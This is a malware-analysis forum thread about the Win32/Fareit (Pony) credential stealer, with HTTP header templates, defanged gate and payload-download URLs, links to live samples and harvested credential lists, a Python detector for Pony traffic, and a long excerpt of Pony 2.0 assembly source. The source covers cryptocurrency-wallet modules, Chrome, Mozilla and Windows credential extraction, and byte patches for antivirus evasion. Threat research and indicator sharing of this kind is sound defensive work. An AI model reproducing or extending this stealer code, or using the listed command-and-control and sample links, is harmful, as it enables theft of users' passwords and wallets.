Win32/Fareit

Forum for analysis and discussion about malware.

Re: Win32/Fareit

Postby unixfreaxjp » Tue Jul 30, 2013 5:13 pm

Spam campaign attachment:
Download header used:
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s (Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0))

Credential posted to gates with below header format:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}

Access to facebook to the setting bars..
2http://www.facebook.com/
abe2869f-9b47-4cd9-a358-c22904dba7f7
pSettings

aPLib compressor's trace:
aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/

Pony gates:
hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php

Download Zbots:
hxxp://198.57.130.35:8080/forum/viewtopic.php
hxxp://bremertondisciples.org/p6AERteJ.exe
hxxp://proactionpt.com/7dPmE3P.exe
hxxp://ruffledpaper.com/N7SvZ.exe

Assembly trace:
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="5.1.0.0" processorArchitecture="x86" name="Progmn.Program_Code" type="win32"></assemblyIdentity><description>Program Description</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>

VT:
https://www.virustotal.com/en/file/9f06 ... /analysis/
Note:
credential list slurped is unchanged.
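
The download and gate header templates above have a fixed shape (HTTP/1.0 with Connection: close, Accept-Encoding: identity, *;q=0, a binary octet-stream POST, and a fixed header order), which is what a proxy log or IDS rule can key on. The following Python is an added example, not code from the original post: it parses raw HTTP requests and lists which of those traits each one carries; the sample requests are constructed from the templates with placeholder hosts, paths and body bytes, and the Trident check rests on the fact that IE8 ships Trident/4.0, so "MSIE 8.0" combined with "Trident/5.0" is an inconsistent User-Agent.

```python
from typing import Dict, List, Tuple

# User-Agent string quoted in the post (the %s in the template is filled with it).
PONY_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"

# Constructed samples modelled on the two header templates from the post.
# Hosts, paths and body bytes are placeholders, not values from the page.
SAMPLE_DOWNLOAD_GET = (
    "GET /payload.exe HTTP/1.0\r\n"
    "Host: dl.example.invalid\r\n"
    "Accept-Language: en-US\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Connection: close\r\n"
    f"User-Agent: {PONY_UA}\r\n"
    "\r\n"
)

SAMPLE_GATE_POST = (
    "POST /ponyb/gate.php HTTP/1.0\r\n"
    "Host: gate.example.invalid\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Accept-Language: en-US\r\n"
    "Content-Length: 8\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Connection: close\r\n"
    "Content-Encoding: binary\r\n"
    f"User-Agent: {PONY_UA}\r\n"
    "\r\n"
    "\x01\x02\x03\x04\x05\x06\x07\x08"  # stands in for the posted report blob
)

# An ordinary browser form post that must not match.
BENIGN_POST = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: text/html\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 8\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    "user=abc"
)

# Header order of the two templates (names lower-cased); the gate template is
# matched on its last four headers only, so a varying Content-Length is fine.
DOWNLOAD_ORDER = ["host", "accept-language", "accept", "accept-encoding",
                  "connection", "user-agent"]
GATE_TAIL = ["content-type", "connection", "content-encoding", "user-agent"]


def parse_request(raw: str) -> Tuple[str, str, str, List[Tuple[str, str]]]:
    """Split a raw request into (method, target, version, ordered headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target, version = parts
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, version, headers


def pony_indicators(raw: str) -> List[str]:
    """Return the names of the Pony header traits present in one request."""
    method, _target, version, headers = parse_request(raw)
    names = [n for n, _ in headers]
    h: Dict[str, str] = dict(headers)
    hits: List[str] = []
    if version == "HTTP/1.0" and h.get("connection") == "close":
        hits.append("http10-close")
    if h.get("accept-encoding") == "identity, *;q=0":
        hits.append("accept-encoding-identity")
    # IE8 ships Trident/4.0; "MSIE 8.0" next to "Trident/5.0" contradicts itself.
    if h.get("user-agent") == PONY_UA:
        hits.append("msie8-trident5-ua")
    if method == "POST":
        if (h.get("content-type") == "application/octet-stream"
                and h.get("content-encoding") == "binary"):
            hits.append("binary-octet-stream-post")
        if names[-4:] == GATE_TAIL:
            hits.append("gate-header-order")
    elif method == "GET" and names == DOWNLOAD_ORDER:
        hits.append("download-header-order")
    return hits


def is_pony_like(raw: str, threshold: int = 3) -> bool:
    """Flag a request when at least `threshold` traits co-occur."""
    return len(pony_indicators(raw)) >= threshold


if __name__ == "__main__":
    for label, req in [("download", SAMPLE_DOWNLOAD_GET),
                       ("gate", SAMPLE_GATE_POST),
                       ("benign", BENIGN_POST)]:
        print(f"{label:8s} {is_pony_like(req)!s:5s} {pony_indicators(req)}")
```

A single trait (HTTP/1.0 with Connection: close, for instance) is common in legitimate tooling, which is why the verdict requires several of them together.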

Re: Win32/Fareit

Postby unixfreaxjp » Tue Jul 30, 2013 5:22 pm

*) My post took too much space, I am sorry. I'll make it shorter. The details that are the same as previously posted will not be written here. Spam campaign again:
Gates:
hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php

Zbots Downloads:
hxxp://www.energiereise-namaste.de/EggT.exe
hxxp://www.labycar.com/Zi6L.exe
hxxp://208.112.50.5/c38QVmd.exe
hxxp://s148231503.onlinehome.us/y3R.exe

VT:
https://www.virustotal.com/en/file/4c10 ... /analysis/

Re: Win32/Fareit

Postby unixfreaxjp » Wed Jul 31, 2013 10:50 am

Three spams with fareit attachments as usual came in today:
The templates are as per below snapshots:
VT:
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/dfce ... /analysis/

The first and second posted credentials to the pony gates below:
h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltaoutriggercafe.com/ponyb/gate.php

and downloaded these zbots:
h00p://magic-crystal.ch/0ijiK8Y.exe
h00p://chartomresidence.com/j7qtsL.exe
h00p://ftp.petrasolutions.com/REXLa9.exe

The last one posts creds to the pony gates below:
h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltadazeresort.net/ponyb/gate.php
and downloads these zbots:
h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe
h00p://paulalfrey.com/guBwFA.exe

I took snapshots of the live Zbot download URLs with URLquery, so people can use them as evidence for clean-up purposes.
So far this is the list, use it at will: http://pastebin.com/raw.php?i=My0JHXGp
Sample can be downloaded via this: http://www.mediafire.com/?clcc8xrehg90qj8

#MalwareMustDie!!

Re: Win32/Fareit

Postby unixfreaxjp » Fri Aug 02, 2013 10:08 am

Today's campaign...As usual, no changes.
VT: https://www.virustotal.com/en/file/71df ... 375431000/
Gates:
h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://bettersigns.net/ponyb/gate.php
and download zbots from:
h00p://ftp.evolplay.org/bzfBGWP.exe
h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe

FYI. Here's the credential data slurped: http://pastebin.com/raw.php?i=pxzThmHS
Sample to download: http://www.mediafire.com/?a18eybj053j38rf

#MalwareMustDie! (not a promotion, a share)

Re: Win32/Fareit

Postby patriq » Sat Jun 21, 2014 3:58 pm

Found something that appears to be Pony 2.0

http://protectyournet.blogspot.com/2014 ... er-20.html

Panel and samples attached. Samples are directly from this new builder.

What are your thoughts?

Re: Win32/Fareit

Postby wacked2 » Sun Jun 22, 2014 2:47 pm

The wallet stealers just use AppDataCommonFileScan.
The TDS feature in the panel is just a normal download command.
Still uses "Host:" and "Connection: close" with HTTP/1.0
It's still mainly a Multi Password Recovery mod.

(Haven't looked into the loader)
(Only partly analyzed, couldn't find a way to remove AntiDisasmTrick with IDA)

Re: Win32/Fareit

Postby forty-six » Fri Jun 27, 2014 2:49 am

@patriq Looks like you weren't alone in that discovery:

https://blog.damballa.com/archives/2558

(from article)

http://pastebin.com/k96W1bPy

Re: Win32/Fareit

Postby Xylitol » Fri Jun 27, 2014 1:10 pm

Here are some code modifications I've spotted in the 2.0 compared with the 1.9 stub source.
I may have missed some parts, but most of the modifications are here, I think.
PasswordModules.asm:
Line 11 (removal of a useless .code, and definitions added):
ITEMHDR_ID               equ 0beef0000h

Line 109 (code addition):
MODULE_BITCOIN            equ 00000061h
MODULE_ELECTRUM            equ 00000062h
MODULE_MULTIBIT            equ 00000063h
MODULE_FTPDISK            equ   00000064h
MODULE_LITECOIN            equ   00000065h
MODULE_NAMECOIN            equ   00000066h
MODULE_TERRACOIN         equ 00000067h
MODULE_BITCOINARMORY      equ 00000068h
MODULE_PPCOIN            equ 00000069h
MODULE_PRIMECOIN         equ 0000006ah
MODULE_FEATHERCOIN         equ 0000006bh
MODULE_NOVACOIN            equ 0000006ch
MODULE_FREICOIN            equ 0000006dh
MODULE_DEVCOIN            equ 0000006eh
MODULE_FRANKOCOIN         equ 0000006fh
MODULE_PROTOSHARES         equ 00000070h
MODULE_MEGACOIN            equ 00000071h
MODULE_QUARKCOIN         equ 00000072h
MODULE_WORLDCOIN         equ 00000073h
MODULE_INFINITECOIN         equ 00000074h
MODULE_IXCOIN            equ 00000075h
MODULE_ANONCOIN            equ 00000076h
MODULE_BBQCOIN            equ 00000077h
MODULE_DIGITALCOIN         equ 00000078h
MODULE_MINCOIN            equ 00000079h
MODULE_GOLDCOIN            equ 0000007ah
MODULE_YACOIN            equ 0000007bh
MODULE_ZETACOIN            equ 0000007ch
MODULE_FASTCOIN            equ 0000007dh
MODULE_I0COIN            equ 0000007eh
MODULE_TAGCOIN            equ 0000007fh
MODULE_BYTECOIN            equ 00000080h
MODULE_FLORINCOIN         equ 00000081h
MODULE_PHOENIXCOIN         equ 00000082h
MODULE_LUCKYCOIN         equ 00000083h
MODULE_CRAFTCOIN         equ 00000084h
MODULE_JUNKCOIN            equ 00000085h


; collect proxy settings stored in browsers (HTTP/HTTPS password grabbing must be enabled in builder!)
COLLECT_PROXY_SETTINGS      equ 1

Line 198 (just a procedure rename):
invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
               
Line 235 (just to match the procedure rename):
IsFileAlreadyProcessed proc uses ebx path
Line 248 (just to match the procedure rename):
invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
Line 261 (just to match the procedure rename):
IsFileAlreadyProcessed endp

Line 442:
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Windows (WinInet) Proxy Settings (used for IE and Chrome based browsers)
; SFTP: not supported

.data
   CProxySettingsRegPath               db   'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
   CProxySettingsRegValue               db   'ProxyServer',0

.code

IFDEF COLLECT_PROXY_SETTINGS

GrabProxySettings proc stream, item_id
   LOCAL   len: DWORD
   LOCAL   mem: DWORD

   mov   len, 0
   invoke   RegReadValueStr, dwCurrentUserKey, offset CProxySettingsRegPath, offset CProxySettingsRegValue, addr len
   .IF   eax
      mov   mem, eax   
      invoke   CommonAppendDataStr, stream, mem, item_id
      invoke   MemFree, mem      
   .ENDIF

   ret
GrabProxySettings endp

ENDIF

Line 476 (code clean-up):
the .data containing this vanished:
   szHWIDValue      db   "HWID",0
   szGUIDFmt      db   "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",0

   win64_getnative      db   "GetNativeSystemInfo",0
   win64_kernel      db   "kernel32.dll",0
   win64_process      db   "IsWow64Process",0

IsWin64 procedure vanished from the code but is called line 518
IsAdmin procedure vanished from the code but is called line 533
InstallHWIDValue procedure vanished from the code but is called line 537

Line 591 (2 comments added):
; Tested: Far Manager v3.0 build 3367 x86
; Tested: Far Manager v3.0 build 3525 x86

Line 747 (comment added for the Windows/Total Commander proc):
; Tested: 8.01 64 bit (Release)

Line 837 (code added, Windows/Total Commander proc):
   mov byte ptr[CWTCIni], 'w'
   mov   byte ptr[CWTCRegPath1+9], 'G'
   mov   byte ptr[CWTCRegPath2+9], 'G'

Line 927 (comment added):
; Tested: WS_FTP Pro 12.4

Line 1123 (added definition for CuteFTP 9):
CCuteFTP_RegPath7   db   "Software\GlobalSCAPE\CuteFTP 9\QCToolbar",0
Line 1286 (added definition for CuteFTP 9):
invoke   CuteFTPProcessQuickConnections, stream, offset CCuteFTP_RegPath7

Line 1306 (no idea if it's a bugfix or an error in my 1.9 package):
anyway this concerns just a one-letter fix for a path name in the FlashFXP dirs, not really a major change (if it is one at all)

Line 1378 (code/comment addition):
   ; AV-FIXes
   mov   byte ptr[CFlashFXP_RegPath1], 'S'
   mov   byte ptr[CFlashFXP_RegPath2], 'S'
   mov   byte ptr[CFlashFXP_RegPath3], 'S'
   mov   byte ptr[CFlashFXP_HistoryName+1], 'H'
   
Line 1812 (code addition):
   mov   byte ptr[CSmartFTPHistMask], 'H'
   
Line 1868 (code addition):
   mov   byte ptr[CTurboFTPDatMask], 'a'

Line 3747 (comment addition):
; Tested: 16.0.1196.73 (Chrome based)

Line 3767 (code addition):
   COperaNewAppDataDir   db   '\Opera Software',0

Line 4219 (procedure rename, refer to line 198):
invoke   IsFileAlreadyProcessed, lpFileName

Line 4408 (code addition):
ChromeCommonScanCustomID proto :DWORD, :DWORD, :DWORD

Line 4447 (code addition):
invoke   ChromeCommonScanCustomID, stream, offset COperaNewAppDataDir, ITEMHDR_ID or 2

Line 4599 (comment edit):
; FTP Voyager 11.x-16.x
Line 4601: (comment edit):
; Tested: Version 16.1.0.0
Line 4610: (code addition):
   CFTPVoyagerProfileFile2   db   'FTPVoyager.ftp.backup',0
   CFTPVoyagerProfileFile3   db   'FTPVoyager.ftp.old.backup',0

Line 4623 (code addition):
      push   eax
      push   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile1, ITEMHDR_ID or 0
      pop   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile2, ITEMHDR_ID or 0
      pop   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile3, ITEMHDR_ID or 0

Line 4703 (code delete):
szSQLite3Imports vanished

Line 4726 (code delete):
szSQLiteMozillaQuery vanished

Line 4737: (code added):
   IFDEF   COLLECT_PROXY_SETTINGS
   szMozillaProxy      db   'moz-proxy://',0
   ENDIF

Line 4896 (code deletion/addition):
MozillaReadSQLColData whole procedure replaced by: ProcessMozillaSQLiteFile proto :DWORD, :DWORD, :DWORD

Line 4898 (code deletion):
Removed into the MozillaReadSQLFile proc the DWORD definitions

Line 4904 (procedure rename, refer to line 198):
invoke   IsFileAlreadyProcessed, szSQLFile

Line 4915 (comment added/code deleted)
; Process SQLite3 database using tiny db engine
LoadDllImports vanished replaced by:    invoke   ProcessMozillaSQLiteFile, stream, szSQLFile, ITEMHDR_ID or 0

Line 4917 (additional code remove about the sqlite3 db)

Line 4967 (procedure rename, refer to line 198):
   invoke   IsFileAlreadyProcessed, szSignonsFile

Line 5071 (code addition):
   IFDEF   COLLECT_PROXY_SETTINGS
   .IF   eax
      invoke   lstrlen, offset szMozillaProxy
      invoke   StrCmpNI, host_line, offset szMozillaProxy, eax
   .ENDIF

Line 5212 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      invoke   StrStrI, ininame, offset szMozillaPrefsJS
      .IF   eax
         invoke   PonyStrCat, dir, offset szSlash
         invoke   PonyStrCatFreeArg1, eax, ininame
         push   eax
         invoke   CommonAppendFile, stream, eax, ITEMHDR_ID or 1
         call   MemFree
      .ENDIF
   ENDIF

Line 61008 (procedure added):
PSExportAUser proc dwType, lpName, lpUser, pData, pDataLen, stream
   invoke   StreamWriteDWORD, stream, dwType

   invoke   lstrlenA, lpName
   inc   eax ; NULL

   invoke   StreamWriteBinaryString, stream, lpName, eax
   invoke   StreamWriteBinaryString, stream, pData, pDataLen

   invoke   lstrlenA, lpUser
   inc   eax ; NULL

   invoke   StreamWriteBinaryString, stream, lpUser, eax
   ret
PSExportAUser endp

Line 6418 (code addition):
szIE7CredAll   db   '*',0
Line 6420 (code addition):
szIE7Comment   db   'SspiPfc',0

Line 6498 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      .IF   MyCredFree && MyCredEnumerate && MyCryptUnprotectData
         mov   pCred, NULL
         mov   Count, 0
         lea   eax, pCred
         push   eax
         lea   eax, Count
         push   eax
         push   0
         push   offset szIE7CredAll
         call   MyCredEnumerate
         .IF   eax && Count && pCred
            mov   esi, pCred
            .WHILE   Count && dword ptr[esi]
               push   esi
               mov   esi, dword ptr[esi]

               invoke   lstrcmpi, dword ptr[esi].CREDENTIAL._Comment, offset szIE7Comment
               .IF   !eax
                  m2m   InBlob.cbData, dword ptr[esi].CREDENTIAL.CredentialBlobSize
                  m2m   InBlob.pbData, dword ptr[esi].CREDENTIAL.CredentialBlob
                  
                  .IF   InBlob.cbData
                     invoke   PSExportAUser, ITEMHDR_ID or 6, [esi].CREDENTIAL.TargetName, [esi].CREDENTIAL.UserName, InBlob.pbData, InBlob.cbData, stream
                     invoke   LocalFree, OutBlob.pbData
                  .ENDIF
               .ENDIF

               pop   esi
               dec   Count
               add   esi, 4
            .ENDW
            push   pCred
            call   MyCredFree
         .ENDIF
      .ENDIF
   ENDIF
   
Line 6547 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      invoke   GrabProxySettings, stream, ITEMHDR_ID or 5
   ENDIF

Line 6929 (code addition):
ELSEIFDEF COMPILE_MODULE_OPERA
   COMPILE_CHROMIUM_CODE   equ   1
Line 6934 (code addition):
   COMPILE_SQLITE3_CODE   equ   1
ELSEIFDEF COMPILE_MOZILLA_CODE
   COMPILE_SQLITE3_CODE   equ   1
ENDIF

IFDEF COMPILE_SQLITE3_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Line 6945 (code addition):
   CChromeWebData      db   'Web Data',0
   CChromeLoginData   db   'Login Data',0
   
Line 6953 (code deletion):
deleted some data related to chrome (szChromeLoginTable, szChromeActionURL, szChromePassValue, [...] szChromeHTTPS

Line 6956 (code deletion):
dwChromeActionURL, dwChromePassValue, dwChromeUserValue
   
Line 7163 (line replace):
mov   eax, TRUE -> invoke   SQLiteBuildDataRecord, NULL, 0, SQLITE_DATATYPE_OTHER, lpDataOut

Line 7229 (comment edition):
; Get data length & pointer for a single cell from 1-dim record array

Line 7378 (code edition):
added 'item_id' into the SQLiteReadPage proc
Line 7488 (code edition):
Same edition as line 7378.
   
Line 7578 (code addition):
push   item_id
   
Line 7596 (code deletion):
Process SQL column definitions
   
Line 7598 (code edition):
added callback_func to SQLiteProcessSQL procedure

Line 7608 (instruction added):
cld

Line 7665 (comment edition):
; Replace double space chars to single space chars ('  ' -> ' ')

Line 7681 (comment edition):
; Process column definitions one by one

Line 7688 (code edition):
replaced invoke SQLiteProcessCol by:
         push   nCol
         push   esi
         call   callback_func
         
Line 7700 (code edition):
same edition as line 7688.

Line 7707 (code addition):
ProcessSQLiteStream proc stream, target_stream, item_id, callback_func
   LOCAL   header[16]: BYTE
   LOCAL   dwStatusCode: DWORD
   
   ; Read database header
   
   invoke   StreamGotoBegin, stream
   invoke   StreamRead, stream, addr header, sizeof header
   .iF   !eax
      ret
   .ENDIF
   
   invoke   CompareMem, addr header, offset szSQLite3Header, sizeof header
   .IF   !eax
      ret
   .ENDIF

   mov   dwStatusCode, TRUE
   invoke   Stream_SafeReadWORD, stream, addr dwStatusCode
   .IF   !eax || !dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   
   ; Validate page size
   push   eax
   sub   ecx, ecx
   .WHILE   eax
      shr   eax, 1
      .IF   CARRY?
         inc   ecx
      .ENDIF
   .ENDW
   pop   eax
   
   .IF   eax == 1
      mov   eax, 65536
   .ENDIF
   
   ; Page size must be power of 2
   .IF   ecx != 1
      sub   eax, eax
      ret
   .ENDIF
   mov   dwSQLitePageSize, eax

   ; File format write version
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   ((eax != 1) && (eax != 2)) || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; File format read version
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   ((eax != 1) && (eax != 2)) || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   
   ; Reserved bytes
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 0 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Maximum embedded payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 64 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Minimum embedded payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 32 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   
   ; Leaf payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 32 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   invoke   Stream_SafeReadSkip, stream, 4*8, addr dwStatusCode
   
   ; Database text encoding
   invoke   Stream_SafeReadDWORD, stream, addr dwStatusCode
   .IF   (eax < 1) || (eax > 3) || (!dwStatusCode)
      sub   eax, eax
      ret
   .ENDIF
   
   mov   dwSQLiteEncoding, eax
   
   invoke   Stream_SafeReadSkip, stream, 40, addr dwStatusCode
   
   ; Start database processing from page 1
   invoke   SQLiteReadPage, stream, target_stream, 1, addr dwStatusCode, item_id, callback_func
   
   ret
ProcessSQLiteStream endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common chromium decryption

IFDEF COMPILE_CHROMIUM_CODE

.data
   CChromeWebData      db   'Web Data',0
   CChromeLoginData   db   'Login Data',0
   szChromeLoginTable    db   'logins',0
   szChromeActionURL   db   'origin_url',0
   szChromePassValue   db   'password_value',0
   szChromeUserValue   db   'username_value',0
   szChromeFTP         db   'ftp://',0
   IFDEF   GRAB_HTTP
   szChromeHTTP      db   'http://',0
   szChromeHTTPS      db   'https://',0
   ENDIF

.data?
   dwChromeActionURLIndex   dd   ?
   dwChromePassValueIndex   dd   ?
   dwChromeUserValueIndex   dd   ?
.code

; Process SQL column definition
SQLiteProcessChromeColDef proc uses edi column_definition, column_index
   invoke   Trim, column_definition
   invoke   StrStrI, column_definition, offset szSQLiteSpaceChar
   .IF   !eax
      ret
   .ENDIF
   mov   byte ptr[eax], 0
   invoke   Trim, column_definition
   
   mov   edi, offset szSQLiteStopWords
@@:
   invoke   lstrcmpi, edi, column_definition
   .IF   !eax
      ret
   .ENDIF
   @Next   @B
   
   invoke   lstrlen, column_definition
   .IF   !eax
      ret
   .ENDIF
   
   invoke   lstrcmpi, column_definition, offset szChromeActionURL
   .IF   !eax
      m2m   dwChromeActionURLIndex, column_index
   .ENDIF
   
   invoke   lstrcmpi, column_definition, offset szChromePassValue
   .IF   !eax
      m2m   dwChromePassValueIndex, column_index
   .ENDIF

   invoke   lstrcmpi, column_definition, offset szChromeUserValue
   .IF   !eax
      m2m   dwChromeUserValueIndex, column_index
   .ENDIF

   mov   eax, TRUE
   ret
SQLiteProcessChromeColDef endp
; Process chrome password data row
SQLiteProcessChromeDataTable proc uses esi edi stream, target_stream, row_array, cell_count, item_id

Line 7904 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
dwChromePassValue -> dwChromePassValueIndex
dwChromeUserValue -> dwChromeUserValueIndex

Line 7906 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
Line 7907 (line edition):
dwChromePassValue -> dwChromePassValueIndex
Line 7908 (line edition):
dwChromeUserValue -> dwChromeUserValueIndex

Line 7960 (line edition):
ITEMHDR_ID or 0 -> item_id

Line 7974 (line edition):
SQLiteProcessDataTable endp -> SQLiteProcessChromeDataTable endp

Line 7985 (line edition):
SQLiteProcessSchemaTable -> SQLiteProcessChromeSchemaTable

Line 8011 (code edition):
mov   dwChromeActionURL, -1 -> mov dwChromeActionURLIndex, -1
Line 8012 (code edition):
mov   dwChromePassValue, -1 -> mov dwChromePassValueIndex, -1
Line 8013 (code edition):
mov   dwChromeUserValue, -1 -> mov dwChromeUserValueIndex, -1

Line 8015 (line edition):
invoke   SQLiteProcessSQL, cell_data, offset SQLiteProcessChromeColDef

Line 8018 (code edition):
.IF   (dwChromeActionURLIndex != -1) && (dwChromePassValueIndex != -1) && (dwChromeUserValueIndex != -1)
Line 8019 (code edition):
invoke   SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessChromeDataTable

Line 8029 (procedure rename):
SQLiteProcessChromeSchemaTable endp

Line 8031 (procedure modification):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
   LOCAL   stream: DWORD

   invoke   StreamCreate, addr stream
   invoke   StreamLoadFromFile, szSQLFileName, stream
   .IF   eax
      invoke   ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
      .IF   !eax
         ; Error occured while processing ".sqlite" file
         ; Send ".sqlite" file for debugging
         ;invoke   CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
      .ENDIF

Line 8044 (code addition):
invoke   StreamFree, stream

Line 8046 (proc code addition):
   ret
ProcessChromeSQLiteFile endp

ChromeAppDataCommonSingleFileScan proc stream, csidl, appdata_dir, config_file, item_id
   invoke   SHGetFolderPathStr, csidl
   .IF   eax
      invoke   PonyStrCatFreeArg1, eax, appdata_dir
      push   eax
      invoke   CommonFileScanCallback, stream, eax, config_file, item_id, offset ProcessChromeSQLiteFile
      call   MemFree

Line 8057 (code addition):
   ret
ChromeAppDataCommonSingleFileScan endp

Line 8060 (proc code addition):
ChromeCommonScanCustomID proc stream, base_appdata_dir, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   ret
ChromeCommonScanCustomID endp

ChromeCommonScan proc stream, base_appdata_dir
   invoke   ChromeCommonScanCustomID, stream, base_appdata_dir, ITEMHDR_ID or 0
   ret
ChromeCommonScan endp

ENDIF

IFDEF COMPILE_MOZILLA_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common Mozilla SQLite3 database decryption

.data
   szMozillaLoginTable db   'moz_logins',0
   szMozillaActionURL   db   'hostname',0
   szMozillaPassValue   db   'encryptedPassword',0
   szMozillaUserValue   db   'encryptedUsername',0

.data?
